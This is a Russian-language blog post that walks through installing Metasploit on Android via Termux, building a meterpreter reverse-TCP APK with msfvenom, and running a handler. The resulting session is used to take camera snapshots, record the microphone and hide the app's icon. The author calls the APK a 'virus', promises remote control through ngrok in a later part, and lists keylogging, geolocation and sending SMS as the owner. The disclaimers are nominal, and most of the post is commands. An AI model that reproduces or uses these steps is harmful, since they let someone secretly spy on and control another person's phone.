Найти в Дзене
Asic
6 подписчиков

Удаленный доступ к android устройству через termux.

605
2 мин
(demo version)
July 14, 2020
Поясняю в названии слова demo version.
Это значит, что данная статья покажет не полный функционал metasploit. (вы сможете установить apk файл себе, и со своего же termux им управлять).
Оглавление
Автор статьи не несёт ответственности за ваши действия!
(demo version)

July 14, 2020

Поясняю в названии слова demo version.

Это значит, что данная статья покажет не полный функционал metasploit. (вы сможете установить apk файл себе, и со своего же termux им управлять).

Не спешите закрывать статью, ибо на разделение есть весомые причины:

Пока создаётся статья full version вы сможете установить metasploit.
Вы потренируетесь на запуске программы на себе, поймете нуансы, закроете вопросы.
К full version вы будет практически готовы, с установленым metasploit
У нас небольшие неполадки с ngrok XD. (к слову именно он позволит управлять файлом удаленно)

Введение

Вкраце мы устанавливаем утилиту для создания apk файла, которым при установке на устройство можно управлять удаленно через наш терминал.

Сразу хочу предупредупредить, что статья будет объемной и сложной, это не спамер, где ввел 2 команды и пользуешься, тут нужно посидеть с часик, разобраться, но поверьте, если вы все сделаете без ошибок прога будет работать на ура, сам пользовался (в ознакомительных целях конечно).

Этот материал несет ознакомительный характер. Я вас ни к чему не призываю! Задача статьи лишь обезопасить пользователя. За все свои действия вы сами несете полную ответственность.

Metasploit

Вводим команды:

Обновляем терминал

apt update && apt upgrade -y

Скачиваем репозитории

pkg install unstable-repo -y

Ну качаем сам metasploit

pkg install metasploit -y

Кода в нем много, так что не удивляейтесь если будет грузить минут 10.

Активация командой

msfconsole
Эта загрузка будет секунд 20, не пугайтесь
Эта загрузка будет секунд 20, не пугайтесь

Создание apk файла

Запускаем metasploit командой

msfconsole
Так должен выглядеть терминал после запуска metasploit
Так должен выглядеть терминал после запуска metasploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=localhost LPORT=4444 R > /sdcard/test.apk

(localhost потому, что файл будет установлен на наше устройство)

(4444 - это стандартный порт на Android)

(в full version в LHOST и LPORT будут значения из ngrok, но пока забудем)

Теперь нужно подождать загрузку файла, это займет около минуты.

Далее переходим в файлы телефона и там будет наш test.apk

-4

Когда файл будет скачан на устройство, мы получим доступ к огромным возможностям.

(снимок камеры, запись микрофона, кейлогер, геолокация, смс от имени владельца устройства и тд)

Вот так будет выглядеть иконка файла после установки
Вот так будет выглядеть иконка файла после установки

Управление вирусом

msfconsole
use exploit/multi/handler

(ждете пока он запустится)

set payload android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
-6

(выходим из termux жмакаем на иконку нашего приложения, ничего не происходит, и снова в termux)

-7

Когда сессия открылась можете сделать снимок камеры

webcam_snap
-8

(снимок будет сохранен в папке termux, чтобы его посмотреть вводим

cp /data/data/com.termux/files/home/*.jpeg /storage/emulated/0/Pictures

Теперь фотография у нас в галерее)

Запись микрофона

record_mic

Ну и сразу скрыть иконку приложения

hide_app_icon

Остальные команды можно посмотреть командой

help

(eсли статья всем очень зайдет, то тогда выпущу отдельную по командам) 

Со всеми вопросами (а они будут, я уверен) пишите в чат.

Пока я готовлю большой материал по termux будут выходить новости и топы!
8